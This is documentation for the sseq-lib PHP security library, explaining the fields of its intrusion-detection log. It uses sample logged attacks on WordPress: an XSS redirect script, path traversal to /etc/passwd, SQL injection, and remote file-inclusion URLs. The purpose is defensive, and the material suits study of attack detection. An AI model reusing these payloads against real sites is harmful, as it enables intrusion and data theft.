Understanding sseq-lib log file
To understand what kind of attacks have been blocked by sseq-lib you should occasionally take a look into the log file you find under „sseq-lib/seq_log/log.txt“. Each blocked attack is logged here with an explication of why it has been blocked.
! Do not open „log.txt“ with your web browser! You could execute some of the malicious code that has been written into the log file!
Each line of the log file represents an attack or the detection of a possible attack which is triggered by the integrated, lightweight IDS (intrusion detection system).
Understanding Log data
Splitting every log line by the comma (,) will result in the following data:
1. date
2. time
3. IP of attacking client
4. where the attack string has been found
- [_GET] : $_GET
- [HGET] : $HTTP_GET_VARS
- [_POS] : $_POST
- [HPOS] : $HTTP_POST_VARS
- [_COO] : $_COOKIE
- [HCOO] : $HTTP_COOKIE_VARS
- [_SES] : $_SESSION
- [HSES] : $HTTP_SESSION_VARS
- [_REQ] : $_REQUEST
- [_GLO] : $GLOBALS
5. explanation of what happened. If the variable name which carried the payload is known it will be named.
6. attack payload
7. used method: GET, POST
8. the file which was used for the attack
9. User Agent of the attacking client
10. referer
Here some examples of blocked attacks against a WordPress installation and their corresponding log line.
XSS (Cross Site Scripting)
Example from log file:
<br />
12.03.2010, 06:16:42, xxx.xxx.xx.xx, [_GET], p: INT param not INT, 99″><script>self.location=String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109);</script>, GET, /index.php, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2),<br />
So here slice by slice:
<br />
1. 12.03.2010 (explanation: date)<br />
2. 06:16:42 (explanation: time)<br />
3. xxx.xxx.xx.xx (IP) (explanation: some typical IP)<br />
4. [_GET] (explanation: attack string was found in super global $_GET)<br />
5. p: INT param not INT (explanation: variable „p“ was not an integer/number)<br />
6. 99″><script>self.location=String.fromCharCode(104,116,116,112,58,47,47,103,111,111,103,108,101,46,99,111,109);</script> (explanation: attack payload – create an iframe)<br />
7. GET (explanation: attack was performed through a GET request)<br />
8. /index.php (explanation: attack was initiated on this file)<br />
9. Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; InfoPath.2) (explanation: user agent of client)<br />
10. EMPTY (explanation: no referer)<br />
Relative Path Traversal.
Example from log file:
<br />
29.03.2010, 22:16:38, xxx.xxx.xx.xx, [_GET], p: INT param not INT, ../../../../../../../../../../../../../../../../../../../../../../../etc/passwd , GET, /index.php, DataCha0s/2.0,<br />
Here the attack payload.
<br />
../../../../../../../../../../../../../../../../../../../../../../../etc/passwd<br />
SQL Injection
Example from log file:
<br />
08:03:28, xxx.xxx.xx.xx, [_GET], page_id: INT param not INT, 133 and 1=0 Union Select 0x787878756E696F6E787878–, GET, /index.php, ,<br />
Here the attack payload.
<br />
133 and 1=0 Union Select 0x787878756E696F6E787878–<br />
Code Injection
Example from log file:
<br />
23.07.2010, 04:12:41, xxx.xxx.xx.xx, [_GET], p: INT param not INT, 446 //index.php?get=http://www.xxxxxxx.cn//bbs/id1.txt??, GET, /index.php, Mozilla/5.0,<br />
Here the attack payload.
<br />
446 //index.php?get=http://www.xxxxxxx.cn//bbs/id1.txt??<br />
Globals Overwrite
Example from log file:
<br />
19.07.2010, 09:27:19, xxx.xxx.xx.xx, [_GET], p: INT param not INT, 26 ///?_SERVER[DOCUMENT_ROOT]=http://www.xxxxxxx.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg???, GET, /index.php, Mozilla/5.0,<br />
Here the attack payload.
<br />
26 ///?_SERVER[DOCUMENT_ROOT]=http://www.xxxxxxx.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg???<br />
